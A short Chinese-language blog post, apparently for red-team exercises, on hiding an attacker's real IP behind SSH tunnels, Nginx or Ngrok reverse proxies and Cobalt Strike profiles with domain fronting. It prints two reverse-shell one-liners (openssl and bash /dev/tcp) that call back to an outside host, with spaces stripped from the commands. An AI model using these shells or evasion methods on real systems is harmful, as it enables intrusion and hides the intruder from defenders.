护网渗透测试反弹SHELL如何隐藏真实IP

在这里我们可以主要了解一下箭头所表示的位置,根据SSH隧道代理的方法,撇开我们VPS用户帐号密码被监控到不谈,真正IP也一清二楚的在网络进程及其有关连接中,老练的防御方人员能够 很直观的察觉是一起【SSH隧道代理行为】,可是在这里也不是我们所必须重视的,终究我们不能把所有防御方当傻瓜,要认清对方的专业能力。在这里我们采用Nginx反向代理的方法,详细达到方法在这里不多概述,有兴趣的同学能够重视Ngrok或是Heroku等方法的设置,还可以自己采用匿名域名及服务器架设。根据上面我们可以瞧见采用反向代理的地址开展SSH隧道转发能够高效的潜藏真正的IP地址,注意在这里的IP地址是Ngrok服务器的地址,因此达到了潜藏的实际效果。反弹shell潜藏在我们平时渗透Linux服务器的情况下,当遇到RCE漏洞的情况下,必须开展反弹获得交互shell的情况下,一般都是采用以下两条指令。

outputo-20211020-090441-318-slqv.png

例1:

mkfifo/tmp/s;/bin/sh-i&1|openssls_client-quiet-connect192.168.1.100:6666>/tmp/s;rm/tmp/s

例2:

bash-c'execbash-i&>/dev/tcp/192.168.1.100/6666<&1'


之上的两个事例能够算是我们平时渗透中最常见的两条反弹shell命令,或许例1的优点是他的数据流量是开展了加密的,在这样的状况下反弹shell执行的指令是不能被流量控制监控到的,顶多也许会报隐蔽隧道通信的异常行为,可是这样的行为针对一个有相应规模的值守单位,真的是太正常了。每一天都会发生数以千计的类似错误报告,并且像向日葵,teamview这样的报警基本上被忽略了。可是我们所必须注意的也正是这样的反弹方法,无论是例1还是例2我们察觉都是不可避免的泄露了真正IP地址。其实在这里的潜藏方法与上面的SSH隧道代理的原理是一样的。都是根据了反向代理的方法达到的,之前的文章中的渗透操作中也有采用这样的方法,然后有师傅咨询过,所以在这里再拿出来冷饭热炒一下。



最后的实际效果,能够瞧见反弹shell的地址为反向代理的域名,连接的端口号为10075而实际上线的端口号并不是这一个,这也仅仅是与前端服务器建立的网络连接,实际真正上线的为前端服务器转发给后端服务器的地址。CosbaltStrikeProfile相信大部分从业渗透工作的同学针对CosbaltStrike这个工具都不陌生,虽然目前一线的红队已经逐渐从CS转到一些小众的C2设施去,可是不置可否的是CS仍然是非常好用的工具,它所提供的Profile自定义数据流量特征的功能,如果设置得体搭配域前置技术达到高信誉域名结合,所制造的实际效果基本上与正常的数据流量没有差异。


分享: